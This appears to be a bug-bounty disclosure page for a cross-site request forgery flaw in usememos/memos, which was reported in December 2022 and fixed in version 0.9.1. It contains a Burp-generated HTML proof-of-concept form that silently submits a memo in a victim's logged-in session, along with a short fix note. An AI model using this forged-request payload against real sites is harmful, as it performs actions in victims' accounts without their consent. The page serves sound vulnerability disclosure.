Add any thoughts via CSRF in usememos/memos


Reported on

Dec 28th 2022


An attacker can add any user thoughts via a CSRF attack

When you send a link to the victim and click on it, any thoughts will be added

Proof of Concept

1- When the attacker adds any thoughts, it then intercepts the request

2- Take this request to generate a CSRF PoC


  <!-- CSRF PoC - generated by Burp Suite Professional -->


  <script>history.pushState('', '', '/')</script>

    <form action="" method="POST" enctype="text/plain">

      <input type="hidden" name="&#123;&quot;content&quot;&#58;&quot;Test&#32;CSRF&quot;&#44;&quot;visibility&quot;&#58;&quot;PRIVATE&quot;&#44;&quot;resourceIdList&quot;&#58;&#91;&#93;&#125;" value="" />

      <input type="submit" value="Submit request" />





Some sources fix CSRF

Add CSRF Token


An attacker can add any user thoughts via a CSRF attack

We are processing your report and will contact the usememos/memos team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a exists a year ago
STEVEN validated this vulnerability a year ago
samirwaleed has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
STEVEN marked this as fixed in 0.9.1 with commit c9bb2b a year ago
STEVEN has been awarded the fix bounty
This vulnerability has now been published a year ago
to join this conversation